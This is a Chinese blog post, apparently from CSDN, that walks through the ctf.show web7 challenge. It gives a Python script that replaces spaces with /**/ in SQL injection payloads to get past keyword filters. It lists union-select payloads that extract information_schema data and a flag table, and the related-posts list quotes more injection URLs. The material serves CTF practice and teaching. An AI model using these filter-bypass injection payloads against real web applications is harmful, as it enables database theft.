SQL注入屏蔽词替换python脚本(例题:ctf.show-web7)

最新推荐文章于 2024-05-26 13:52:18 发布
最新推荐文章于 2024-05-26 13:52:18 发布
阅读量547 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: mysql python 数据库 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/119838050
版权
本文介绍了在CTF比赛和Linux环境中如何使用脚本批量替换SQL注入关键字,以避免payload修改的繁琐。通过示例脚本展示了如何替换并演示了关键字屏蔽的常见绕过方法。在实例中,解析了一个SQL注入场景,展示了如何探测和规避关键字屏蔽以获取数据,最终成功获取flag。
摘要由CSDN通过智能技术生成

适用场景

在ctf中经常会有关键字的屏蔽,例如屏蔽空格,屏蔽select等关键字。使用脚本直接完成关键字替换,避免pyload修改过于麻烦。
同时适用于linux等命令的屏蔽

常见绕过

学习链接:
https://www.cnblogs.com/Vinson404/p/7253255.html

脚本

shield=' '#屏蔽词
replace='/**/'#替换值

#and=&&  or=||
#下面是参考payload,自己输入时注释以#结尾最好
payload1="1' or 1=1#"
payload2="1' or 1=1 order by 3#"
payload3="1' union select 1,2,3#"

payload4="1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),3#"

payload5="1' union select 1,(select flag from web2.flag),3#"
#payload=input('please input your payload:\n')

new_payload=payload5.replace(shield,replace)

print('替换后的值:')

print(new_payload)

结果示例:

替换后的值:
1'/**/union/**/select/**/1,(select/**/flag/**/from/**/web2.flag),3#

例题(ctf.show-web7)

在这里插入图片描述

这里仿真的是一个文章查看及查询的界面,它的url有关键字?id=1,可以确定为sql注入
在这里插入图片描述
进行探测,提示错误,那很有可能是屏蔽了关键字,使用脚本替换空格再放进去
在这里插入图片描述
探测成功,并且有两个位置回显
在这里插入图片描述
按照常规流程获取数据,获取时发现貌似还屏蔽了 and,避开就好
在这里插入图片描述
取得flag
在这里插入图片描述

sayo.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFtime.org-CTF-events:CTFtime.org-CTF-events KR
04-12
CTFtime.org-CTF-事件CTFtime.org-CTF-events KR
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
ctf.show web7
qq_53319483的博客
11-17 3536
ctf.show web7
CTF WebCTFShow web7 Writeup(SQL注入+PHP+进制转换)
最新发布
HEX9CF的技术博客
05-26 692
1阿呆得到最高指示,如果还出问题,就卷铺盖滚蛋,阿呆心在流血。
ctfshow-web7
aarong的博客
12-22 1265
如题所示: 随意点入一个文章,在URL中发现有?id=x这样参数,因此判断有SQL注入点: 跟上题一样这题也是过滤空格的 把空格改成/**/,发现没有过滤 随后就是把?id=-1,联合查询就行了 http://63d80c8a-317e-4b8f-a2a0-0af74c123b1b.challenge.ctf.show/index.php/?id=-1/**/union/**/select/**/1,database(),3 得到数据库web7 爆表得到三张表flag、page、user 这里
ctfshow web7
博客地址 www.sec0nd.top
02-25 996
文章目录题目分析解题过程 题目分析 打开题目后,有三个文章 随便点一个之后发现网址上有个后缀 ?id=2 应该是get传参的注入了 在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注 他这个过滤了空格,用/**/代替(详见web6 wp) 解题过程 盲注都是一个一个对比,很麻烦,所以这里用大佬的脚本做题 import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.ch
ROSE笔记-ctf.show_web7-WP
居上
11-06 255
ctf.show_web7 使用盲注 payload: /?id=1’ or 1=1# 发现过滤了空格所以报错 用//替换空格 payload: /?id=1’//or/**/1=1# 此时页面正常显示 接下来就是查库、查表、查段 查到显示位置 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,2,3# 查表 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**
linuxprivchecker:linuxprivchecker.py - Linux特权升级检查脚本
02-05
Linuxprivchecker.py Linux特权升级检查脚本 原始作者:Mike Czumak(T_v3rn1x... 这是为了帮助用户进一步了解这些特权升级的工作方式,并使其与针对OSCP,HTB和其他CTF /考试设计的自我利用的规则保持一致。 我们将在
CTFWEBchallenge:CTF-WEB-challs的集合主要用于审查目的
04-27
1. **基础Web漏洞**:例如SQL注入,其中攻击者通过输入恶意SQL语句来获取、修改或删除数据库信息;文件包含漏洞,使得攻击者能够控制包含的文件路径,可能导致远程代码执行。 2. **XSS攻击**:分为反射型、存储型和...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
ctfshow web7-9
qq_61988806的博客
12-08 320
web7-9 通过点击几个目录发现id在变化可能存在sql注入 使用/?id=1 and 1来测试 发现出错 尝试找出过滤 最后发现过滤了空格使用/**/来绕过 构造/?id=1/**/and/**/1 和/?id=1/**/and/**/0 时sql恒不成立 构建 ?id=1/**/and/**/1/**/order/**/by/**/3 来查段 得到段为3 构建/?id=-1/**/union/**/select/**/1,2,3(由于使用联...
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 612
ctfshow web7-web10
CTFshow-web-web7
qq_68581192的博客
10-11 142
尝试联合注入,先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断段显示的位置,输入。发现只有一个flag段,查询flag表中的flag段,输入。点击第一篇,发现url中有id=1,可能存在sql注入漏洞。当前使用的数据库web7,再查询当前数据库的所有表,输入。发现一个flag表,再查询flag表中的所有段,输入。尝试输入id=1 and 1=1#,发现有错误。回显位置为2,查询当前使用的数据库,输入。
CTFshow web7
sinat_31884905的博客
05-21 382
```php # -*- coding: utf-8 -*- """ Created on Fri May 21 11:23:55 2021 @author: Administrator """ import requests s=requests.session() url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/" table="" for i in ran.
刷题之旅第27站,CTFshow web7
cc菜的一批
02-17 1000
感谢ctf show平台提供题目 过滤了空格,使用/**/绕过,之后就是常规的注入方式了。 尝试web题目之前,数据库结构,搜索得到flag index.php?id=0/**/or/**/1=1/**/**/union/**/select/**/1,flag,3/**/from/**/flag# 原创文章不易,点个赞再走吧。 ...
CTF-show WEB入门--web7
m0_73912575的博客
12-30 580
CTF-show WEB入门--web7
[ctfshow web7-8]
L1ni01
11-14 476
web7 我一直在想,如果关键被过滤了,怎么去判读段长度? 其实盲注的话,貌似就没有这个麻烦了 做题之前先判断哪些关键被过滤了, index.php?id=1'or1=1# index.php?id=1'or 1=1# 一碰到空格就报错,空格被过滤用 /**/绕过 1.爆库名(web7) 当输入为id=-1/**/or/**/ascii(substr(database(),1,1))=119时出现文章内容,证明库名的第一个符为‘w’,以此类推。 2.爆表名(flag,page,user) id=-
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值